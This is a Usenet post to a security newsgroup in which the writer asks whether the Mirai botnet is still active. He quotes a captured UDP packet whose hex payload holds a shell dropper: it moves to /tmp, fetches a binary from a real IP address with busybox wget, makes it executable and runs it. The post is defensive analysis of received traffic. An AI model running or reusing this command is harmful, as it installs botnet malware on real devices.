Mirai botnet

From	Marc SCHAEFER <schaefer@alphanet.ch>
Newsgroups	rocksolid.shared.security
Subject	Mirai botnet
Date	2023-02-04 16:18 +0000
Organization	Posted through news.alphanet.ch
Message-ID	<trm0gu$6n4$1@shakotay.alphanet.ch> (permalink)

Show all headers | View raw

Hello,

is the Mirai botnet still active?

I got a few datagrams like this lately (dest address anonymized)

09:27:22.916608 IP (tos 0x0, ttl 245, id 54321, offset 0, flags [none], proto UDP (17), length 136)
    107.189.12.152.47159 > 1.2.3.4.9034: [no cksum] UDP, length 108
        0x0000:  4500 0088 d431 0000 f511 0176 6bbd 0c98  E....1.....vk...
        0x0010:  0102 0304 b837 234a 0074 0000 6f72 663b  .....7#J.t..orf;
        0x0020:  6364 202f 746d 703b 2072 6d20 2d72 6620  cd./tmp;.rm.-rf.
        0x0030:  6d70 736c 3b20 2f62 696e 2f62 7573 7962  mpsl;./bin/busyb
        0x0040:  6f78 2077 6765 7420 6874 7470 3a2f 2f31  ox.wget.http://1
        0x0050:  3034 2e32 3434 2e37 322e 382f 6875 616d  04.244.72.8/huam
        0x0060:  7073 6c3b 2063 686d 6f64 202b 7820 6875  psl;.chmod.+x.hu
        0x0070:  616d 7073 6c3b 202e 2f68 7561 6d70 736c  ampsl;../huampsl
        0x0080:  206d 7073 6c3b 2023                      .mpsl;.#

Shall I assume that:

   - 107.189.12.152 is probably spoofed, because UDP, and so I should
     not report it?

   - 104.224.72.8 should be reported, especially since it really hosts
     the URL http://104.224.72.8/huamsl and after manual download, this
     is seen as Mirai by an online virus detector ?

Is it the real Mirai, and do you also see attempts like this, or is
it maybe a targetted attack?

-- 
Attention: limitez le nombre de lignes de citation à l'essentiel, sinon
je ne verrai pas votre réponse. Et si vous écrivez souvent des bobards,
je ne vous lirai plus et je recommanderai (NoCeM) de ne plus vous lire.

Back to rocksolid.shared.security | Previous | Next | Find similar

Thread

Mirai botnet Marc SCHAEFER <schaefer@alphanet.ch> - 2023-02-04 16:18 +0000

csiph-web